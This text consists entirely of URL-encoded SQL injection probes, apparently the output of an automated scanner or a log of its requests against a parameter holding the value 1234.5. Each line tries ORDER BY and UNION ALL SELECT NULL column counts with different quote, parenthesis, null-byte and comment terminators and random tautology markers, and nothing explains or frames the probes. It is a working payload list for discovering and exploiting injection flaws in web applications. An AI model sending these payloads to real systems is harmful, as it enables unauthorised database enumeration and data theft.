1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22wtLP%22%20LIKE%20%22wtLP 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22RDIm%22%20LIKE%20%22RDIm 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22TOXL%22%20LIKE%20%22TOXL 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22YEYz%22%20LIKE%20%22YEYz 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%22vAnY%22%20LIKE%20%22vAnY 1234.5%22%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%28%22YsSy%22%20LIKE%20%22YsSy 1234.5%22%29%29%29%20ORDER%20BY%209266%00%20AND%20%28%28%28%22OvjK%22%20LIKE%20%22OvjK 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%28%28%28%22DMcD%22%20LIKE%20%22DMcD 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%28%28%28%22Tggc%22%20LIKE%20%22Tggc 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22tqrb%22%20LIKE%20%22tqrb 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22RUpt%22%20LIKE%20%22RUpt 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22EafD%22%20LIKE%20%22EafD 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22CLRw%22%20LIKE%20%22CLRw 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22kynq%22%20LIKE%20%22kynq 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22aGZN%22%20LIKE%20%22aGZN 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22dQGh%22%20LIKE%20%22dQGh 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%28%28%28%22ZqEP%22%20LIKE%20%22ZqEP 1234.5%22%20ORDER%20BY%201%00%20AND%20%22IYih%22%20LIKE%20%22IYih 1234.5%22%20ORDER%20BY%208099%00%20AND%20%22DAPh%22%20LIKE%20%22DAPh 1234.5%22%20UNION%20ALL%20SELECT%20NULL%00%20AND%20%22nKYD%22%20LIKE%20%22nKYD 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20AND%20%22mUqg%22%20LIKE%20%22mUqg 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22fDAG%22%20LIKE%20%22fDAG 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22FBui%22%20LIKE%20%22FBui 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22albc%22%20LIKE%20%22albc 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22UkZb%22%20LIKE%20%22UkZb 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22wQLL%22%20LIKE%20%22wQLL 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22wNBg%22%20LIKE%20%22wNBg 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22dDAp%22%20LIKE%20%22dDAp 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20AND%20%22gdLb%22%20LIKE%20%22gdLb 1234.5%29%20WHERE%205618%3D5618%20ORDER%20BY%201%00 1234.5%29%20WHERE%206365%3D6365%20ORDER%20BY%205637%00 1234.5%29%20WHERE%208137%3D8137%20UNION%20ALL%20SELECT%20NULL%00 1234.5%29%20WHERE%209750%3D9750%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%29%20WHERE%201103%3D1103%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209152%3D9152%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%207596%3D7596%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%207459%3D7459%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209040%3D9040%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%201777%3D1777%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%203391%3D3391%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%29%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%209879%3D9879%20ORDER%20BY%201%00 1234.5%27%29%20WHERE%202835%3D2835%20ORDER%20BY%205981%00 1234.5%27%29%20WHERE%205390%3D5390%20UNION%20ALL%20SELECT%20NULL%00 1234.5%27%29%20WHERE%207706%3D7706%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%205281%3D5281%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%203181%3D3181%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206993%3D6993%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%201466%3D1466%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%202817%3D2817%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%203472%3D3472%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%206948%3D6948%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%29%20WHERE%203272%3D3272%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%206071%3D6071%20ORDER%20BY%201%00 1234.5%27%20WHERE%201243%3D1243%20ORDER%20BY%206805%00 1234.5%27%20WHERE%205880%3D5880%20UNION%20ALL%20SELECT%20NULL%00 1234.5%27%20WHERE%205940%3D5940%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%27%20WHERE%206691%3D6691%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%205332%3D5332%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209370%3D9370%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%202289%3D2289%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%208016%3D8016%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209402%3D9402%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%207813%3D7813%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20WHERE%209644%3D9644%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205759%3D5759%20ORDER%20BY%201%00 1234.5%22%20WHERE%206673%3D6673%20ORDER%20BY%209443%00 1234.5%22%20WHERE%204402%3D4402%20UNION%20ALL%20SELECT%20NULL%00 1234.5%22%20WHERE%202115%3D2115%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00 1234.5%22%20WHERE%201680%3D1680%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%206005%3D6005%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%205709%3D5709%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%208144%3D8144%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%201855%3D1855%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%203670%3D3670%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%204502%3D4502%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%22%20WHERE%204360%3D4360%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00 1234.5%27%20%7C%7C%20%28SELECT%206221%20FROM%20DUAL%20WHERE%205999%3D5999%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204532%20FROM%20DUAL%20WHERE%202499%3D2499%20ORDER%20BY%201948%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208943%20FROM%20DUAL%20WHERE%201345%3D1345%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204543%20FROM%20DUAL%20WHERE%207365%3D7365%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202127%20FROM%20DUAL%20WHERE%209353%3D9353%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201198%20FROM%20DUAL%20WHERE%208913%3D8913%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201774%20FROM%20DUAL%20WHERE%206759%3D6759%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205349%20FROM%20DUAL%20WHERE%202938%3D2938%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205896%20FROM%20DUAL%20WHERE%206865%3D6865%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207183%20FROM%20DUAL%20WHERE%208598%3D8598%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208354%20FROM%20DUAL%20WHERE%209052%3D9052%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203448%20FROM%20DUAL%20WHERE%201705%3D1705%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208040%20WHERE%203654%3D3654%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201450%20WHERE%205494%3D5494%20ORDER%20BY%201973%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203751%20WHERE%208857%3D8857%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208961%20WHERE%206646%3D6646%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205162%20WHERE%207932%3D7932%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206952%20WHERE%206597%3D6597%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208169%20WHERE%201010%3D1010%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%205312%20WHERE%208354%3D8354%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%202309%20WHERE%204187%3D4187%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207882%20WHERE%203465%3D3465%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203177%20WHERE%202357%3D2357%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204523%20WHERE%208094%3D8094%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%208167%20FROM%20DUAL%20WHERE%207726%3D7726%20ORDER%20BY%201%00%20%29 1234.5%20%2B%20%28SELECT%208180%20FROM%20DUAL%20WHERE%203249%3D3249%20ORDER%20BY%203092%00%20%29 1234.5%20%2B%20%28SELECT%205143%20FROM%20DUAL%20WHERE%202649%3D2649%20UNION%20ALL%20SELECT%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%208320%20FROM%20DUAL%20WHERE%209802%3D9802%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204207%20FROM%20DUAL%20WHERE%204382%3D4382%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201884%20FROM%20DUAL%20WHERE%206965%3D6965%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207551%20FROM%20DUAL%20WHERE%208377%3D8377%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203758%20FROM%20DUAL%20WHERE%202235%3D2235%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207855%20FROM%20DUAL%20WHERE%203619%3D3619%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203428%20FROM%20DUAL%20WHERE%207835%3D7835%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203282%20FROM%20DUAL%20WHERE%205698%3D5698%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204793%20FROM%20DUAL%20WHERE%201488%3D1488%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%202916%20WHERE%209961%3D9961%20ORDER%20BY%201%00%20%29 1234.5%20%2B%20%28SELECT%204845%20WHERE%204848%3D4848%20ORDER%20BY%209868%00%20%29 1234.5%20%2B%20%28SELECT%204559%20WHERE%206970%3D6970%20UNION%20ALL%20SELECT%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207061%20WHERE%205329%3D5329%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%203641%20WHERE%207821%3D7821%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204790%20WHERE%208209%3D8209%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206381%20WHERE%209177%3D9177%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%201658%20WHERE%204051%3D4051%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%206047%20WHERE%203894%3D3894%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%208856%20WHERE%203966%3D3966%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%207623%20WHERE%207334%3D7334%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%20%2B%20%28SELECT%204088%20WHERE%205894%3D5894%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29 1234.5%27%20%2B%20%28SELECT%20%27ZhUt%27%20FROM%20DUAL%20WHERE%204750%3D4750%20ORDER%20BY%201%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UZjm%27%20FROM%20DUAL%20WHERE%204187%3D4187%20ORDER%20BY%208813%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27AlkW%27%20FROM%20DUAL%20WHERE%204232%3D4232%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27UcOl%27%20FROM%20DUAL%20WHERE%202022%3D2022%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27mbTe%27%20FROM%20DUAL%20WHERE%206492%3D6492%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27HgDR%27%20FROM%20DUAL%20WHERE%207428%3D7428%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27wLzT%27%20FROM%20DUAL%20WHERE%205403%3D5403%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uvPO%27%20FROM%20DUAL%20WHERE%205718%3D5718%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27zcso%27%20FROM%20DUAL%20WHERE%205164%3D5164%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27JUvS%27%20FROM%20DUAL%20WHERE%202589%3D2589%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27KXWN%27%20FROM%20DUAL%20WHERE%202183%3D2183%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27sxpz%27%20FROM%20DUAL%20WHERE%209800%3D9800%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27OxCb%27%20WHERE%201356%3D1356%20ORDER%20BY%201%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27KodG%27%20WHERE%209558%3D9558%20ORDER%20BY%204081%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27pywE%27%20WHERE%205930%3D5930%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27CZQA%27%20WHERE%208958%3D8958%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27kFgO%27%20WHERE%201165%3D1165%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27gmOd%27%20WHERE%204580%3D4580%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27lGEm%27%20WHERE%203665%3D3665%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Ipwr%27%20WHERE%205546%3D5546%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27Gcfn%27%20WHERE%204336%3D4336%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27IxKP%27%20WHERE%204183%3D4183%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27tCvI%27%20WHERE%206971%3D6971%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27dniJ%27%20WHERE%201741%3D1741%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%208619%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 